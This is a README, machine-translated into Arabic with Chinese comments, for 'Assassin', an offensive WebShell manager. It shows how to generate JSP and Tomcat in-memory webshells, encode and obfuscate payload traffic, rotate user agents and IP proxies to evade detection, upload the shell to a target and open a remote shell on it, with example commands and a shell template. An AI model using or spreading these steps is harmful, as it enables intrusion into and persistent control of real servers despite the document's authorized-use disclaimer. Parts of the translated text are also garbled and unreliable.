Assassin

Assassin هي أداة إدارة WebShell القائمة على سطر الأوامر. إنه يحتوي على مجموعة متنوعة من طرق إرسال وترميز الحمولة ، بالإضافة إلى رمز الحمولة النافعة ، مما يجعله قاتلًا مخفيًا ويصعب الدفاع عنه جيدًا.

الأدوات قصيرة وموجزة ، ويمكن أن تكون WebShell التي تم إنشاؤها أكثر شيوعًا وخلطًا ، مما يقلل من خصائص حركة المرور للتفاعل بعد الاتصال ، ويمكن تخصيص طريقة إرسال الحمولة المحددة. بسبب محدودة الطاقة الشخصية ، لأنني كسول و ، الخادم يدعم Java فقط.

البيان: إنه أساسًا للاختراق القانوني أو مسابقات AWD الطالب المصرح بها من قبل موظفي الأمن السيبراني. لا يجوز لأحد أن يستخدمه لأغراض غير قانونية أو أغراض تحقيق الأرباح ، وإلا فإن العواقب يجب أن تتحملها بأنفسهم.

[1] يمكن أن يكون WebShell الذي تم إنشاؤه أكثر شيوعًا من قتل البرامج (يمكن تخصيص قوالب الويب وتعديلها)

[2] حجم WebShell هو 1 كيلو بايت فقط. يحتاج العميل والخادم فقط إلى تحميل رمز البايت مرة واحدة لنفس النوع من الاتصالات ، وتنقل حركة المرور اللاحقة فقط الأوامر.

[3] يمكن إرسال الحمولة بأربع طرق: Get ، Post ، ملف تعريف الارتباط ، ومختلط. يمكن تعديلها ديناميكيًا ، وحركة المرور مربكة للغاية.

[4] تدعم حركة المرور التفاعلية بين العميل والخادم طرق ترميز متعددة ، والتي يمكن تعديلها ديناميكيًا

[5] يمكن تخصيص أسماء المعلمات والكمية المرسلة بواسطة الحمولة ، ودعم عوامل IP العشوائية ومكيلين المستخدمين

برنامج مشابه لوضع تشغيل MSF

ملفات تعريف الارتباط:

بريد:

مختلط:

يحصل:

بالإضافة إلى طريقة ملفات تعريف الارتباط ، يمكن لـ Get و Post و Mixed تعديل طريقة الإرسال ديناميكيًا بعد إنشاء اتصال ، دون تغيير الخادم.

طلب الترميز:

1. BASE64
2. BASE36
3. عرافة

ترميز الاستجابة:

1. BASE64
2. خام
3. BASE36
4. عرافة

يمكن تعديل طريقة الترميز للاستجابة ديناميكيًا

الخادم: JRE 1.5 وما فوق

العميل: JDK 1.8 وما فوق

{
  "paramNames" : [ " user " , " file " , " id " , " eid " , " wd " , " ie " , " oq " , " name " , " son " ],
  // get、post、mixed请求参数名的随机池
  "cookieNames" : [ " fid " , " uuid " , " eid " , " home " , " ief " , " fl " , " oop " ],
  // cookie请求参数名的随机池
  "headers" :{
    "Accept" : " text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 " ,
    "Accept-Encoding" : " gzip, deflate, br " ,
    "Accept-Language" : " Accept-Language: zh-CN,zh;q=0.9 " ,
    "Upgrade-Insecure-Requests" : " 1 "
  },
  // http头部
  "partNum" : 3 ,
  // payload首次发送的分块数量
  "argNum" : 5 ,
  // 每次请求的参数个数，不能超过paramNames或者cookieNames的参数个数
  "startRandomUserAgent" : false ,
  // 是否随机useragent
  "startIpAgents" : false ,
  // 是否开启ip池代理模式
  "startColor" : true
  // 是否启用命令行颜色
}

يستخدم useragent العشوائي المستخدم في ./useragents.txt. بعد الانفتاح ، سيتم استبدال المستخدم في كل مرة يتم فيها تمكين الطلب. يتم استخدامه بشكل عام مع وكيل IP. عند الإغلاق ، يتم بدء جلسة WebShell بأمر الجلسة في كل مرة.

يستخدم تجمع وكيل IP ./ipagents.txt ، التنسيق هو ip:posr;username:password . إذا لم تكن المصادقة مطلوبة ، فسيكون ip:port على ما يرام. بعد الافتتاح ، سيتم تحديد وكيل من كل طلب.

نصيحة: يرجى إغلاق "startColor" بعد بدء تشغيل مستخدم Windows ، أو استخدم Windows Terminal للبدء

جميع الأوامر بسيطة نسبيًا ، يمكنك عرض المعلمات من خلال أمر المساعدة

help [command] عرض مساعدة أمر محدد

ابدأ بـ Startup.bat أو startup.sh

new java 123 cookie
# 生成密码为123 发送方式为cookie的普通jsp木马
new java pass post reqEncode=base36 tamper=tomcat9_filter
# 生成密码为pass 发送方式为post 请求用base36编码的tomcat9 filter内存马 

النصائح: هناك العديد من المعلمات لإضافة أوامر جديدة ، ويمكن أيضًا تعيين المعلمات الاختيارية المغلفة بين قوسين باستخدام المفتاح = القيمة.

ثم ستحدد نافذة منبثقة موقع حفظ

قم بتحميل WebShell على الخادم المستهدف

add http://192.168.48.130:8080/1.jsp 123 java method=cookie resEncode=base36
# 添加webshell 密码123 java马 cookie传参 请求编码默认base64 响应编码base36

show رقم معرف العرض

session 1 الاتصال بـ WebShell

عندما ترى التغييرات المطالبة ، يمكنك تنفيذ أمر أوامر WebShell Controller!

Assassin | java > getshell
Assassin | java | C: a pache-tomcat-9.0.54 b in > dir

ملف تحميل

upload # 没参数默认传到当前目录

حدد الملف للتحميل

download ./test.txt ينطبق الشيء نفسه

تمتلئ الجزء الأول بـ {key} ، يمثل كلمة مرور الويب

يتم ملء الجزء الثاني بـ {getValue} ، والذي يمثل الرمز الذي يحصل على طلب الحمولة

الجزء الثالث مليء بـ {decode} ، يمثل رمز فك التشفير

القالب كما يلي:

 String k = "{@key}" ; // aes密钥 123456 md5的前16位
String r = "" ; //密文payload存放位置，这个参数名必须为r，其他的无所谓
// 取密文
{ @ getvalue }
byte [] cText = { @ decode };

إذا ظل المنطق الرئيسي الآخر دون تغيير ، فيمكنك الاتصال بنجاح.

مثال

يرجى الاطلاع